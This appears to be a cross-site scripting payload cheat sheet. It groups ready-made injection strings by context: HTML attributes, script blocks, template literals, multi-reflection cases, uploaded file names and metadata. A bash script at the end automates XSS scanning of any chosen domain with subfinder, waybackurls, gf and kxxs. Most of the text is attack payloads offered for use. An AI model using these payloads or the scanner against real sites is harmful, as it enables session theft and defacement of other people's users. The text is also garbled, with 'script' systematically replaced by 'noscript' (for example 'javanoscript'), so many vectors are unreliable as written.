Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in next case. Prepend a “-->” to payload if input lands in HTML comments.
<noscript onload=alert(1)>
"><noscript onload=alert(1)>

HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<noscript><style><noscript><textarea><nonoscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><noscript onload=alert(1)>
"></tag><noscript onload=alert(1)>

HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //

HTML Injection - Source

Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). Src attribute in noscript tags can be an URL or “data:,alert(1)”.
javanoscript:alert(1)

Javanoscript Injection
Use when input lands in a noscript block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//


Javanoscript Injection - Escape Bypass
Use when input lands in a noscript block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//

Javanoscript Injection – Script Breakout
Use when input lands anywhere within a noscript block.
</noscript><noscript onload=alert(1)>

Javanoscript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a noscript block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Javanoscript Injection - Quoteless

Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\

Javanoscript Context - Placeholder Injection in Template LiteralUse when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}

Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><noscript/1='
'>alert(1)</noscript><noscript/1='
/alert(1)</noscript><noscript>/

Multi Reflection i HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<noscript/1='
-alert(1)">'onload="<noscript/1='
/</noscript>'>alert(1)/<noscript/1='

Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<noscript/1='&q='onload=alert(1)>
p=<noscript 1='&q='onload='/&r=/alert(1)'>
q=<noscript/&q=/src=data:&q=alert(1)>

Use when uploaded filename is reflected somewhere in target page.
"><noscript onload=alert(1)>.gif

Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><noscript onload=alert(1)>' xss.jpeg

Use to create a stored XSS on target when uploading image files. Save content below as
“xss.noscript”.
<noscript xmlns="http://www.w3.org/2000/noscript" onload="alert(1)"/>

Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where noscript tag and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javanoscript:alert(1)>
<details open ontoggle=alert(1)>
<noscript><noscript onload=alert(1)>

Use when native javanoscript code inserts into page the results of a request to an URL that can be controlled by attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javanoscript:alert(1)>

Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><noscript onload=alert(1)>?a=reader

Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javanoscript:alert`1`)

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>

1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs

#!/bin/bash

# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"